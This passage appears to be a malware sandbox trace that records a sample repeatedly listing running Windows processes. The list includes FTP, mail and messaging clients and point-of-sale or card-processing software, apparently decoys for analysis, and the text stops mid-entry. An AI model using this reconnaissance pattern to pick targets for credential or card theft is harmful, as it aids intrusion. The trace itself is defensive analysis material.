Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0222.406] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.407] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.409] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.411] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.413] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.415] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0222.417] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0222.422] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0222.423] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0222.425] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0222.427] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0222.428] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0222.429] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0222.431] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0222.472] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0222.473] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0222.475] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0222.477] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0222.478] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0222.482] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0222.483] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0222.485] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0222.486] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.488] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.489] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0222.490] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.492] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.493] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.494] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.498] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.500] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.502] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0222.504] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0222.505] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0222.507] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0222.509] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0222.529] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.531] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.532] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.534] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.536] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.537] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.539] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.541] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.553] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.555] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.556] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.561] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.563] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.564] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.566] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.568] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.569] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.571] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.624] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.626] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.628] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.629] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.631] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.632] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.633] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.635] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.656] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.657] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.659] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.660] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0222.662] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0222.663] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0222.665] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0222.666] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0222.670] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.672] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.673] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.675] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0222.676] CloseHandle (hObject=0x2278) returned 1 [0222.676] Sleep (dwMilliseconds=0x64) [0222.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0222.806] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.808] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.812] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.813] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.815] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.816] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.818] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.819] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.820] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 